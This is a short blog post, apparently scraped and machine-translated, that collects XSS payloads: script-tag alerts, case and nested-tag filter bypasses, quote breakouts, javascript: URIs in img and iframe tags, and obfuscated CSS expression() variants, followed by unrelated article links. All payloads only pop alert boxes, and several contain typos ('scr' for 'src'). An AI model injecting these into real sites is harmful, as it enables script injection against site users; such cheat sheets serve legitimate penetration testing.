当前位置:网站首页>XSS collect common code
XSS collect common code
2022-07-25 22:26:00 【Chang Jiazhuang】
The longest used must be :
<script>alert("xss")</script>
DOM Type general use
<a href='#' onclick="alert(1111)">Click to see?</a>
Case around
'"><sCrIpT>alert(63252)</sCrIpT>
Filter script Bypass
<scr<script>ipt>alert("XXSSSS")</scr</script>ipt>
htmlentities() No filter single quotation marks , Directly use single quotation marks to bypass
';alert('xss');'
structure js Bypass
</script><script>alert('xss')</script>
Other code collected
<img scr=javascript:alert("xss")></img>
http://www.example.com/MyApp.aspx?myvar= "></XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
<IFRAME SRC=javascript:alert('test')></IFRAME>
" οnclick="alert(1)"
<img scr="javascript: alert(/xss/)></img>
(? use tab Key out of the space )
<img scr="javas????cript:alert(/xss/)" width=150></img>
<img scr="#" onerror=alert(/xss/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
(/**/ Notation )
<img scr="#"/* */onerror=alert(/xss/) width=150></img>
<img src=vbscript:msgbox ("xss")></img>
<style> input {
left:expression (alert('xss'))}</style>
<div style={
left:expression (alert('xss'))}></div>
<div style={
left:exp/* */ression (alert('xss'))}></div>
<div style={
left:\0065\0078ression (alert('xss'))}></div>
html Entity <div style={
left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
Update from time to time during collection ……
边栏推荐
- How to resolve a domain name to multiple IP addresses?
- Wkid in ArcGIS
- 淦,为什么 '𠮷𠮷𠮷' .length !== 3 ??
- Don't know mock test yet? An article to familiarize you with mock
- Perform Jieba word segmentation on the required content and output EXCEL documents according to word frequency
- TFrecord写入与读取
- LabVIEW 开发 PCI-1680U双端口CAN卡
- 数据质量:数据治理的核心
- Synchronized and volatile
- 什么是类加载?类加载的过程?
猜你喜欢

About vscode usage+ Solutions to the problem of tab failure

(1) DDL, DML, DQL, DCL and common data types

If jimureport building block report is integrated according to the framework

Ffmpeg plays audio and video, time_ Base solves the problem of audio synchronization and SDL renders the picture

Usage of in in SQL DQL query

Victoriametrics single node of kubernetes

Playwright tutorial (II) suitable for Xiaobai

H5 lucky scratch lottery free official account + direct operation

SQL中in的用法 DQL 查询

Smart S7-200 PLC channel free mapping function block (do_map)
随机推荐
Advanced database · how to add random data for data that are not in all user data - Dragonfly Q system users without avatars how to add avatar data - elegant grass technology KIR
[database learning] redis parser & single thread & Model
C语言逆序打印字符串的两种方法
Title: give a group of arrays, arranged from large to small and from small to large.
Wechat official account application development (I)
(1) DDL, DML, DQL, DCL and common data types
还不懂mock测试?一篇文章带你熟悉mock
Get together for ten years, tell your story, millions of gifts are waiting for you
xss-工具-Beef-Xss安装以及使用
Pyspark data analysis basis: pyspark.sql.sparksession class method explanation and operation + code display
Gan, why '𠮷 𠮷'.Length== 3 ??
Output Yang Hui triangle with two-dimensional array
Square root of X
字符型常量和字符串常量的区别?
Interpretation of the source code of all logging systems in XXL job (line by line source code interpretation)
Data governance under data platform
数据平台下的数据治理
Use of hyperlinks
【数据库学习】Redis 解析器&&单线程&&模型
SQL中in的用法 DQL 查询